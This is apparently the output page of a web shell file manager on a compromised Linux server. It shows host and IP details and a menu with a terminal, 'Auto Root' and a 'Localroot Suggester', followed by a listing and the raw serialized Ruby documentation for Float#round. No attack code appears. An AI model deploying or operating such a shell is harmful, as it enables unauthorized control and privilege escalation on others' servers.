Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.198
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
Float /
Delete
Unzip
Name
Size
Permission
Date
Action
%25-i.ri
994
B
-rw-r--r--
2026-04-07 17:42
%2a%2a-i.ri
628
B
-rw-r--r--
2026-04-07 17:42
%2a-i.ri
578
B
-rw-r--r--
2026-04-07 17:42
%2b-i.ri
636
B
-rw-r--r--
2026-04-07 17:42
%2d%40-i.ri
301
B
-rw-r--r--
2026-04-07 17:42
%2d-i.ri
591
B
-rw-r--r--
2026-04-07 17:42
%2f-i.ri
585
B
-rw-r--r--
2026-04-07 17:42
%3c%3d%3e-i.ri
1.21
KB
-rw-r--r--
2026-04-07 17:42
%3c%3d-i.ri
714
B
-rw-r--r--
2026-04-07 17:42
%3c-i.ri
655
B
-rw-r--r--
2026-04-07 17:42
%3d%3d%3d-i.ri
727
B
-rw-r--r--
2026-04-07 17:42
%3d%3d-i.ri
763
B
-rw-r--r--
2026-04-07 17:42
%3e%3d-i.ri
717
B
-rw-r--r--
2026-04-07 17:42
%3e-i.ri
658
B
-rw-r--r--
2026-04-07 17:42
abs-i.ri
572
B
-rw-r--r--
2026-04-07 17:42
angle-i.ri
320
B
-rw-r--r--
2026-04-07 17:42
arg-i.ri
418
B
-rw-r--r--
2026-04-07 17:42
cdesc-Float.ri
8.45
KB
-rw-r--r--
2026-04-07 17:42
ceil-i.ri
1.25
KB
-rw-r--r--
2026-04-07 17:42
coerce-i.ri
742
B
-rw-r--r--
2026-04-07 17:42
denominator-i.ri
455
B
-rw-r--r--
2026-04-07 17:42
divmod-i.ri
1.02
KB
-rw-r--r--
2026-04-07 17:42
eql%3f-i.ri
824
B
-rw-r--r--
2026-04-07 17:42
fdiv-i.ri
623
B
-rw-r--r--
2026-04-07 17:42
finite%3f-i.ri
700
B
-rw-r--r--
2026-04-07 17:42
floor-i.ri
1.26
KB
-rw-r--r--
2026-04-07 17:42
hash-i.ri
382
B
-rw-r--r--
2026-04-07 17:42
infinite%3f-i.ri
879
B
-rw-r--r--
2026-04-07 17:42
inspect-i.ri
1004
B
-rw-r--r--
2026-04-07 17:42
magnitude-i.ri
228
B
-rw-r--r--
2026-04-07 17:42
modulo-i.ri
971
B
-rw-r--r--
2026-04-07 17:42
nan%3f-i.ri
518
B
-rw-r--r--
2026-04-07 17:42
negative%3f-i.ri
348
B
-rw-r--r--
2026-04-07 17:42
next_float-i.ri
2.02
KB
-rw-r--r--
2026-04-07 17:42
numerator-i.ri
599
B
-rw-r--r--
2026-04-07 17:42
phase-i.ri
320
B
-rw-r--r--
2026-04-07 17:42
positive%3f-i.ri
351
B
-rw-r--r--
2026-04-07 17:42
prev_float-i.ri
1.36
KB
-rw-r--r--
2026-04-07 17:42
quo-i.ri
650
B
-rw-r--r--
2026-04-07 17:42
rationalize-i.ri
726
B
-rw-r--r--
2026-04-07 17:42
round-i.ri
2.02
KB
-rw-r--r--
2026-04-07 17:42
to_d-i.ri
988
B
-rw-r--r--
2026-04-07 17:42
to_f-i.ri
332
B
-rw-r--r--
2026-04-07 17:42
to_i-i.ri
671
B
-rw-r--r--
2026-04-07 17:42
to_int-i.ri
651
B
-rw-r--r--
2026-04-07 17:42
to_r-i.ri
824
B
-rw-r--r--
2026-04-07 17:42
to_s-i.ri
1022
B
-rw-r--r--
2026-04-07 17:42
truncate-i.ri
1.27
KB
-rw-r--r--
2026-04-07 17:42
zero%3f-i.ri
328
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::AnyMethod[iI" round:ETI"Float#round;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"6Returns +self+ rounded to the nearest value with ;TI"-a precision of +ndigits+ decimal digits.;To:RDoc::Markup::BlankLine o; ; [I"DWhen +ndigits+ is non-negative, returns a float with +ndigits+ ;TI",after the decimal point (as available):;T@o:RDoc::Markup::Verbatim; [I"f = 12345.6789 ;TI"f.round(1) # => 12345.7 ;TI"f.round(3) # => 12345.679 ;TI"f = -12345.6789 ;TI"f.round(1) # => -12345.7 ;TI" f.round(3) # => -12345.679 ;T:@format0o; ; [I"4When +ndigits+ is negative, returns an integer ;TI"7with at least <tt>ndigits.abs</tt> trailing zeros:;T@o;; [I"f = 12345.6789 ;TI"f.round(0) # => 12346 ;TI"f.round(-3) # => 12000 ;TI"f = -12345.6789 ;TI"f.round(0) # => -12346 ;TI"f.round(-3) # => -12000 ;T; 0o; ; [I"*If keyword argument +half+ is given, ;TI">and +self+ is equidistant from the two candidate values, ;TI"9the rounding is according to the given +half+ value:;T@o:RDoc::Markup::List: @type:BULLET:@items[o:RDoc::Markup::ListItem:@label0; [o; ; [I"*+:up+ or +nil+: round away from zero:;T@o;; [I"&2.5.round(half: :up) # => 3 ;TI"&3.5.round(half: :up) # => 4 ;TI"'(-2.5).round(half: :up) # => -3 ;T; 0o;;0; [o; ; [I" +:down+: round toward zero:;T@o;; [I"&2.5.round(half: :down) # => 2 ;TI"&3.5.round(half: :down) # => 3 ;TI"'(-2.5).round(half: :down) # => -2 ;T; 0o;;0; [o; ; [I"J+:even+: round toward the candidate whose last nonzero digit is even:;T@o;; [I"&2.5.round(half: :even) # => 2 ;TI"&3.5.round(half: :even) # => 4 ;TI"'(-2.5).round(half: :even) # => -2 ;T; 0o; ; [I"=Raises and exception if the value for +half+ is invalid.;T@o; ; [I"Related: Float#truncate.;T: @fileI"numeric.c;T:0@omit_headings_from_table_of_contents_below0I"8round(ndigits = 0, half: :up]) -> integer or float ;T0[ I"(p1 = v1, p2 = {});T@SFI" Float;TcRDoc::NormalClass00